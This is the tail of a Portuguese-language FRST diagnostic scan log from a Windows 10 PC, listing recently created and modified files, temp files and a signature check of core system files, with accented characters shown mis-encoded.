2017-10-18 13:14 - 2017-09-29 05:38 - 000498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.Office2013CustomActions.dll
2017-10-18 13:14 - 2017-09-29 05:38 - 000454144 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2017-10-18 13:14 - 2017-09-29 05:38 - 000414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-10-18 13:14 - 2017-09-29 05:37 - 001513984 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-10-18 13:14 - 2017-09-29 05:37 - 000793088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplySettingsTemplateCatalog.exe
2017-10-18 13:14 - 2017-09-29 05:37 - 000513024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.PrinterCustomActions.dll
2017-10-18 13:14 - 2017-09-29 05:36 - 001208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-10-18 13:14 - 2017-09-29 05:36 - 000834560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.CommonBridge.dll
2017-10-18 13:14 - 2017-09-29 05:36 - 000457216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-10-18 13:14 - 2017-09-29 05:34 - 000841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AgentService.exe
2017-10-18 13:14 - 2017-09-29 05:32 - 002373632 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-10-18 13:14 - 2017-09-29 05:32 - 001490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.ModernAppAgent.dll
2017-10-18 13:13 - 2017-09-30 00:10 - 000370072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbhub.sys
2017-10-18 13:13 - 2017-09-30 00:04 - 000127384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbccgp.sys
2017-10-18 13:13 - 2017-09-29 05:42 - 000027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-10-18 09:25 - 2017-10-18 09:27 - 000000000 ____D C:\Users\Filipe\Desktop\Festa das CrianÃ§as R Nonato
2017-10-17 10:59 - 2017-09-18 20:37 - 000434592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-10-17 10:59 - 2017-09-18 20:15 - 000648704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2017-10-17 10:58 - 2017-09-18 20:50 - 000902896 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-10-17 10:58 - 2017-09-18 20:50 - 000790816 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-10-17 10:58 - 2017-09-18 20:47 - 001089344 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-10-17 10:58 - 2017-09-18 20:47 - 000954592 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-10-17 10:58 - 2017-09-18 20:40 - 000877984 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-10-17 10:58 - 2017-09-18 20:20 - 000049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringclient.dll
2017-10-17 10:58 - 2017-09-18 20:19 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\eShims.dll
2017-10-17 10:58 - 2017-09-18 20:18 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll
2017-10-16 09:57 - 2017-10-16 09:57 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign8c5d917940f47ff4
2017-10-16 09:57 - 2017-10-16 09:57 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign473b870f6a4473d2
2017-10-16 09:55 - 2017-10-16 09:55 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign2140568dd0cec1c7
2017-10-16 09:54 - 2017-10-16 09:54 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign4764025ec76e5a21
2017-10-16 09:54 - 2017-10-16 09:54 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign30b95b3921c8c78e
2017-10-16 09:15 - 2017-10-21 10:53 - 000000000 ____D C:\Users\Filipe\AppData\LocalLow\BitTorrent
2017-10-14 15:23 - 2017-04-26 20:24 - 000358569 _____ C:\Users\Filipe\Documents\contra capaa2.pdf
2017-10-14 15:23 - 2017-04-08 11:30 - 023131217 _____ C:\Users\Filipe\Documents\capa.cdr
2017-10-14 15:23 - 2017-04-08 11:30 - 023131217 _____ C:\Users\Filipe\Documents\CAPA (2).cdr
2017-10-13 19:47 - 2017-10-13 19:47 - 000042722 _____ C:\Users\Filipe\Documents\ana julia.wlmp
2017-10-13 17:33 - 2017-10-13 17:33 - 000000000 ____D C:\Users\Filipe\AppData\Local\{E8D244EB-AE0F-4B51-93B8-8080F74B599A}
2017-10-13 09:34 - 2017-10-13 18:45 - 000000000 ____D C:\Users\Filipe\Desktop\ana julia
2017-10-10 13:10 - 2017-10-16 11:25 - 000000000 ____D C:\Users\Filipe\Desktop\SAUDAÃÃES
2017-10-10 09:02 - 2017-10-10 17:38 - 000000000 ____D C:\Users\Filipe\Downloads\IrmÃ£ Eva
2017-10-10 09:00 - 2017-10-10 11:23 - 000000000 ____D C:\Users\Filipe\Downloads\Louvores Mp3
2017-10-06 10:35 - 2017-10-06 10:35 - 000749796 _____ C:\Users\Filipe\Desktop\ApresentaÃ§Ã£o de LIBRAS.pptx
2017-10-05 13:15 - 2017-10-05 13:15 - 000000000 ____D C:\WINDOWS\system32\Adobe
2017-10-05 12:01 - 2008-08-18 20:18 - 000077824 _____ (Fox Magic Software) C:\WINDOWS\system32\fmcodec.DLL
2017-10-04 17:23 - 2017-10-26 17:18 - 000000000 ____D C:\Users\Filipe\Documents\CARTÃO RESPOSTA
2017-10-04 10:03 - 2017-10-04 10:03 - 000000000 ____D C:\Users\Filipe\AppData\Roaming\Neoretix
2017-10-03 12:08 - 2017-10-06 16:25 - 000000000 ____D C:\Users\Filipe\Desktop\SIMULADOS NOITE 1Âº DIA
2017-10-03 11:17 - 2017-10-06 16:47 - 000000000 ____D C:\Users\Filipe\Desktop\SIMULADOS 2Âº DIA - OUTUBRO 2017
2017-10-02 16:26 - 2017-10-02 16:27 - 000000000 ____D C:\Users\Filipe\Desktop\TUDO
2017-10-02 12:43 - 2017-10-16 17:05 - 000000000 ____D C:\Users\Filipe\Desktop\GC AI-alice
2017-10-02 10:05 - 2017-10-02 09:56 - 000670976 _____ C:\Users\Filipe\Documents\CÃ³pia_de_seguranÃ§a_de_cartÃ£o resposta MONSENHOR 1Âº ANO.cdr
2017-10-02 09:56 - 2017-10-02 10:05 - 000651654 _____ C:\Users\Filipe\Documents\cartÃ£o resposta MONSENHOR 1Âº ANO.cdr
2017-10-02 09:28 - 2017-10-02 09:28 - 000000000 ____D C:\Users\Filipe\AppData\Local\{EECBC261-C464-4197-BE6B-5666E4EEC07B}
2017-09-30 11:38 - 2017-09-29 18:23 - 000649508 _____ C:\Users\Filipe\Documents\CÃ³pia_de_seguranÃ§a_de_ARVORE.cdr

==================== Um MÃªs Modificados arquivos e pastas ========

(Se uma entrada for incluÃ­da na fixlist, o arquivo/pasta serÃ¡ movido.)

2017-10-30 12:01 - 2017-04-26 12:27 - 000000000 ____D C:\Brother
2017-10-30 09:38 - 2017-03-18 16:23 - 000000000 ___HD C:\Program Files\WindowsApps
2017-10-30 09:38 - 2017-03-18 16:23 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-10-30 09:07 - 2017-06-08 15:06 - 000000000 ____D C:\WINDOWS\system32\Java
2017-10-30 09:06 - 2009-07-14 00:04 - 000000423 _____ C:\WINDOWS\win.ini
2017-10-29 17:16 - 2015-12-13 20:18 - 000000000 ____D C:\Users\Filipe\AppData\Roaming\vlc
2017-10-28 13:23 - 2017-08-11 10:04 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-10-28 13:05 - 2017-05-02 12:59 - 000000000 ____D C:\Users\Filipe\AppData\Roaming\BitTorrent
2017-10-28 13:05 - 2015-12-14 15:13 - 000000000 ____D C:\Users\Filipe\AppData\Roaming\MPC-HC
2017-10-28 13:04 - 2017-08-07 11:46 - 000000000 ___DC C:\WINDOWS\Panther
2017-10-28 13:04 - 2017-03-18 16:23 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-10-28 13:04 - 2017-03-18 16:21 - 000000000 ____D C:\WINDOWS\INF
2017-10-27 16:15 - 2017-08-11 10:47 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-10-27 16:14 - 2017-03-18 04:02 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2017-10-26 18:19 - 2017-03-18 16:23 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-10-24 18:20 - 2017-09-12 17:17 - 000000000 ____D C:\Users\Filipe\Documents\simulado setembro 2017
2017-10-23 10:37 - 2017-09-20 12:26 - 000000000 ____D C:\Users\Filipe\Downloads\Compressed
2017-10-22 11:48 - 2017-08-11 10:09 - 002394814 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-10-22 11:48 - 2017-03-19 07:33 - 000960348 _____ C:\WINDOWS\system32\prfh0416.dat
2017-10-22 11:48 - 2017-03-19 07:33 - 000265388 _____ C:\WINDOWS\system32\prfc0416.dat
2017-10-20 12:56 - 2017-03-18 16:23 - 000000000 ____D C:\WINDOWS\rescache
2017-10-19 11:03 - 2015-12-11 06:26 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-10-19 10:59 - 2017-08-11 10:03 - 003878256 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-10-18 20:07 - 2017-03-18 16:23 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-10-18 20:07 - 2017-03-18 16:23 - 000000000 ____D C:\WINDOWS\Provisioning
2017-10-18 20:07 - 2017-03-18 16:23 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2017-10-18 20:05 - 2017-03-18 16:23 - 000207872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msclmd.dll
2017-10-18 16:15 - 2017-03-21 15:08 - 000000000 ____D C:\Users\Filipe\Downloads\downloads tudo
2017-10-18 15:05 - 2017-03-18 16:14 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-10-18 15:04 - 2015-12-13 20:54 - 000000000 ____D C:\Users\Todos os UsuÃ¡rios\Microsoft Help
2017-10-18 15:02 - 2015-12-11 02:46 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-10-18 13:46 - 2015-12-11 02:46 - 124059592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-10-18 13:33 - 2017-03-18 16:23 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2017-10-17 13:05 - 2016-01-09 13:01 - 000000000 ____D C:\Users\Filipe\AppData\Local\ElevatedDiagnostics
2017-10-12 22:21 - 2017-08-31 09:24 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2017-10-12 22:21 - 2017-08-31 09:24 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2017-10-11 18:24 - 2017-09-28 10:47 - 000000000 ____D C:\Users\Filipe\Desktop\SIMULADOS 1Âº DIA - OUTUBRO 2017
2017-10-10 10:13 - 2016-12-22 18:04 - 000000000 ____D C:\FFOutput
2017-10-09 18:25 - 2017-04-27 18:56 - 000000000 ____D C:\Users\Filipe\Downloads\word
2017-10-06 10:59 - 2016-02-19 13:19 - 000000000 ____D C:\Users\Filipe\AppData\Local\UmmyVideoDownloader
2017-10-04 12:19 - 2015-12-11 06:26 - 000000000 ____D C:\Users\Filipe\AppData\Local\Packages
2017-09-30 11:38 - 2017-09-29 18:23 - 000573235 _____ C:\Users\Filipe\Documents\ARVORE.cdr

==================== Arquivos na raiz de alguns diretÃ³rios =======

2016-04-15 12:34 - 2016-12-01 17:54 - 000000132 _____ () C:\Users\Filipe\AppData\Roaming\Adobe PNG Format CS6 Prefs
2017-02-15 15:29 - 2017-02-15 15:58 - 000003058 _____ () C:\Users\Filipe\AppData\Roaming\droid4xinstaller.log
2017-05-24 14:31 - 2017-05-24 14:31 - 000003475 _____ () C:\Users\Filipe\AppData\Roaming\go00001.bak
2016-02-15 12:04 - 2016-02-15 12:04 - 000000002 _____ () C:\Users\Filipe\AppData\Roaming\UINF.txt
2016-01-22 15:21 - 2016-01-22 15:21 - 000000042 _____ () C:\Users\Filipe\AppData\Roaming\WB.CFG
2016-09-29 10:34 - 2016-09-29 10:34 - 000003369 _____ () C:\Users\Filipe\AppData\Local\recently-used.xbel
2016-01-04 09:44 - 2016-01-04 09:44 - 000000057 _____ () C:\ProgramData\Ament.ini
2017-08-11 10:08 - 2017-08-11 10:08 - 000000000 ____H () C:\ProgramData\DP45977C.lfl
2015-12-10 22:20 - 2015-12-10 22:20 - 000489984 _____ () C:\ProgramData\DRV10.tmp
2015-12-10 22:20 - 2015-12-10 22:20 - 018782720 _____ (OEM) C:\ProgramData\E2010.tmp

Alguns arquivos em TEMP:
====================
2017-10-29 17:10 - 2011-04-26 18:47 - 000330240 _____ () C:\Users\Filipe\AppData\Local\Temp\SDL_0.dll

==================== Bamital & volsnap ======================

(NÃ£o hÃ¡ correÃ§Ã£o automÃ¡tica para arquivos que nÃ£o passaram na verificaÃ§Ã£o.)

C:\WINDOWS\explorer.exe => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\winlogon.exe => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\wininit.exe => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\svchost.exe => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\services.exe => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\User32.dll => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\userinit.exe => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\rpcss.dll => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\dnsapi.dll => O arquivo Ã© assinado digitalmente
C:\WINDOWS\system32\Drivers\volsnap.sys => O arquivo Ã© assinado digitalmente

LastRegBack: 2017-10-20 13:47

==================== Fim de FRST.txt ============================